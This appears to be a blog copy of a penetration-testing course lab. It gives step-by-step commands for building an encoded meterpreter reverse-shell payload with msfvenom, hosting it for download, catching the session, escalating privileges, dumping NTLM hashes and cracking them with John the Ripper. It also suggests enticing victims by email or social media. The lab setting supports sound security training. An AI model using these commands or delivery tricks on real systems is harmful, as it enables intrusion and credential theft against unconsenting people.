Powered by Blogger.
Home » » Module 06: Network Penetration Testing Methodology-Internal 10

Module 06: Network Penetration Testing Methodology-Internal 10

Written By AKADEMY on Wednesday, July 3, 2019 | 11:18 AM

Exercise 10: Exploiting and Escalating Privileges on a Windows Operating System

Scenario

Password hacking is one of the easiest and most common ways hackers obtain unauthorized computer or network access. Although strong passwords that are difficult to crack (or guess) are easy to create and maintain, users often neglect this. Therefore, passwords are one of the weakest links in the information-security chain. Passwords rely on secrecy. After a password is compromised, its original owner isn’t the only person who can access the system with it. Hackers have many ways to obtain passwords. Hackers can obtain passwords from local computers by using password-cracking software. To obtain passwords from across a network, hackers can use remote cracking utilities or network analyzers. This chapter demonstrates just how easily hackers can gather password information from your network and describes password vulnerabilities that exist in computer networks.
The objective of this lab is to help students learn how to:
  • Exploit a vulnerable machine
  • Escalate privileges
  • Obtain password hashes
  • Crack the password hashes
Lab Duration30 Minutes
  1. Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  2. Type root in the Username field and click Next.
    Screenshot
  3. Type toor in the password field and click Sign In.
    Screenshot
  4. In this lab, we are going to target the IP address 172.20.20.9 (Advertisement Dept. Subnet D machine), which was identified during the ping sweep scan in the previous lab exercise.
    This lab is a part of White Box Penetration Testing, where you are given information that the machine is running on a vulnerable operating system.
  5. Click Terminal icon from the taskbar to launch the command line terminal.
    Screenshot
  6. Type the command msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=172.20.20.21 lport=443 -f exe > /root/Desktop/shikata.exe and press Enter.
    This generates a shikata_ga_nai payload in the name of shikata.exe on the Desktop.
    Screenshot
  7. Type the command service apache2 start and press Enter. Issuing this command launches the apache server which allows you to share files with remote users.
    If you are performing the lab while the Greenbone Security Assistant Daemon (gsad) is already running, apache server might fail to start. In such case, you need to stop the OpenVas service before starting the Apache server.
    Screenshot
  8. Open a new command line terminal and type mkdir /var/www/html/share and press Enter to create a new directory "share" in the html folder.
    Screenshot
  9. Change permissions for the share folder to 755, by entering the following command:
    chmod -R 755 /var/www/html/share/
    Screenshot
  10. Type the command cp /root/Desktop/shikata.exe /var/www/html/share and press Enter.
    Issuing the command copies the payload to share folder.
    Screenshot
  11. Type the command msfconsole and press Enter. This launches msfconsole.
    Screenshot
  12. Type the command use exploit/multi/handler in the msfconsole and press Enter. This allows msfconsole to use the multi/handler exploit.
    Screenshot
  13. Type the command set payload windows/meterpreter/reverse_tcp and press Enter. This allows msfconsole to set the meterpreter/reverse_tcp payload.
    Screenshot
  14. Issue the following commands:
    set lhost 172.20.20.21
    set lport 443
    By issuing these commands, whenever a victim executes the payload shikata.exe, it connects the victim to the lhost i.e., 172.20.20.21 through the port 443 (lport).
    Now, type show options command and press Enter. This displays the default and the configured options as shown in the screenshot.
    Screenshot
  15. Type the command exploit and press Enter. This initiates the multi/handler exploit.
    So, when the intended victim downloads the shikata.exe payload and executes it, a meterpreter session is established and the target machine comes under your control.
    In realtime, a pentester may share this payload with a victim through a medium such as social media, email, and shared network drives, and entice him/her to download and execute it.
    Since this is a lab demonstration, we assume that the pentester has already sent the link and we as a victim will open the link and execute the payload.
    Screenshot
  16. CLick Marketing Dept Subnet D, log in to Administrator account and close the Server Manager window.
    The login credentials are:
    Username: Administrator
    Password: Pa$$w0rd
    You can use the Ctrl+Alt+Delete, then Type Password option from the Commands menu to enter the password.
    Screenshot
  17. Launch the Firefox web browser, type the URL http://172.20.20.21/share and press Enter.
    A webpage appears displaying the payload. Click the link shikata.exe in order to download the payload.
    If a Microsoft Windows pop-up window appears asking to restart the machine, click the Restart Later option.
    Screenshot
  18. An Opening shikata.exe pop-up appears, click Save File button to save the payload on the machine.
    Screenshot
  19. Downloads pop-up appears on the top-right corner of the webpage, displaying the shikata.exe file that has been downloaded. Click the file to execute it.
    Screenshot
  20. An Open File - Security Warning pop-up appears, click Run in order to execute the payload.
    Screenshot
  21. Once you click Run in the Advertisement Dept. Subnet D machine, a meterpreter sessions will be opened in the Kali Linux machine as shown in the screenshot.
    Switch to the Kali Linux (Internal Network)machine.
    Screenshot
  22. Type the command getsystem in the meterpreter shell and press Enter. This escalates your privileges to access the victim machine.
    Screenshot
  23. Type the command run hashdump and press Enter. This command extracts all the LM, and NTLM hashes from the target machine as displays them and shown in the screenshot.
    Screenshot
  24. Click the Leafpad icon (green color) on the taskbar to open a text file.
    Screenshot
  25. Switch to the command line terminal, select the hashes obtained for users rebeccastevesam, and anderson, right-click on the hashes and copy them.
    Screenshot
  26. Now, paste the copied hash content into the newly opened text file.
    Screenshot
  27. Select File from the menu bar and click Save.
    Screenshot
  28. Save As window appears, type hashes.txt in the Name field and choose Desktop as the location to save the file and click Save.
    Close all the windows that were opened.
    Screenshot
  29. Now, you need to decrypt the password hashes. You shall be using the John the Ripper tool in order to decrypt them.
    Before launching john the ripper, you need to disable the CPUID.
    To do this task, launch a new command line terminal, type export CPUID_DISABLE=1 and press Enter.
    Screenshot
  30. Since the hashes that were obtained are of "nt" format, issue the command john --format=nt /root/Desktop/hashes.txt and press Enter.
    Screenshot
  31. Wait until the hashes are successfully decrypted. On successful decryption of the hashes, you will be presented with the passwords as shown in the screenshot.
    Screenshot
  32. Now you have the usernames and their respective passwords. You can use these credentials to remotely log in to the target machine.
  33. You need to take the screenshots of the established meterpreter session and the obtained password hashes and save them to the pentesting folder.
In this lab, you have learned how to:
  • Exploit a vulnerable machine
  • Obtain password hashes
  • Crack the password hashes
Share this article :

0 comments:

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT